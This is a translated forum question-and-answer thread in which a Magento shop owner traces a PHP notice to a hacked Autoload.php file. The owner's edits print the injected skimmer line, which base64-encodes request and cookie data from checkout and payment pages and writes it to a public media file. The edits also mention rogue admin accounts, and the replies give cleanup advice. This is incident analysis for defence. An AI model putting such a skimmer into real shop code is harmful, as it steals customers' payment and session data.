magento — Уведомление Mage PHP: неопределенный индекс: REQUEST_URI в /htdocs/lib/Varien/Autoload.php в строке 1

С этого утра я получаю следующее
Уведомление PHP после запуска cronjob Magento:

Неопределенный индекс: REQUEST_URI в /htdocs/lib/Varien/Autoload.php в
строка 1

Я не модифицировал ни один из файлов мага .. Как это возможно?

РЕДАКТИРОВАТЬ:
На данный момент я отредактировал Autoload.php, чтобы сначала проверить, установлен ли REQUEST_URI.

Оригинал:

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))

Новое:

<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))

РЕДАКТИРОВАТЬ 30-04-2015:

После прочтения комментариев @volkan и @ b.enoit.be я немедленно заменил указанную страницу оригинальной страницей от Magento, и строка действительно отсутствовала !.

Ниже приведена вредоносная строка, присутствующая в Autoload.php

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>

Я также проверил:

  • /js/index.php такой же как оригинал
  • /index.php такой же как оригинал
  • Magpleasure_Filesystem модуля не было

Однако … появилось два новых администратора-пользователя с непонятными именами:

  • резервное копирование[email protected] <- этот домен ведет к владению доменом
    страница и электронная почта дают результаты на русском языке в Google
  • база данных[email protected]

Оба пользователя были удалены.
Веб-сайт также был уязвим для эксплойта магазина (который рассматривается в последнем патче безопасности)

В настоящее время мы заняты установкой последних исправлений безопасности.

Кажется, что это была недавняя проблема:

100 000 интернет-магазинов открыты для компромисса, поскольку злоумышленники используют ошибку Magento
Magento Shoplift Bug Tester v1.0

Спасибо всем пользователям за помощь.

5

Решение

похоже, что ваша страница была взломана, замените файл на исходный и установите исправления безопасности для magento. Проверьте, есть ли какие-либо новые администраторы в бэкэнде и для модуля Magpleasure_Filesystem

проверьте также
/js/index.php
/index.php

1

Другие решения

Это определенно скомпрометированный файл.

Если кто-то еще сталкивается с той же проблемой, media/catalog/product/cache_catalogs Файл также должен быть удален, потому что он содержит конфиденциальные данные (запросы и данные cookie-файлов со страниц оформления заказа или оплаты) и является общедоступным (в media/ папка).

0

По вопросам рекламы [email protected]